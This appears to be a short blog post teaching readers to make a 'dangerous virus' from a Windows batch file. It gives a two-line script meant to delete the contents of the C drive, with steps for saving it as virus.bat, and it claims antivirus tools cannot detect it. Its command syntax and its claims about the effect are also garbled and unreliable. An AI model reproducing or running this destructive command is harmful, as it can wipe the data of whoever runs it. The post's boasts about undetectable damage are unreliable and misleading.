Learn To Make Dangerous Virus
In A Minute
Now In this post i will tell
you to make simple but very powerfull or you
can say harmfull computer virus using a bat
file. No any type of softwares is required to make this
virus, Noteapad is enough. The awesome
thing about this virus is it is not detected by
any AntiVirus.
You will create this virus using bat file
programs. This virus will delete the C
Drive completely.
If
you want to learn more about batch
programming visit my post about Learn Batch
Programming.
1. Open Notepad and copy below code in it.
@Echo off
Del C:\ *.* |y
2. Save that file as virus.bat (Name can be
anything but .bat is must)
3. Now, running this file will delete all the
content of C Drive .
Warning: Please don't try to run on your own
computer or else it will delete all the content
of your C Drive. I will not be responsible for
any damage done to your computer.
No comments :
Post a Comment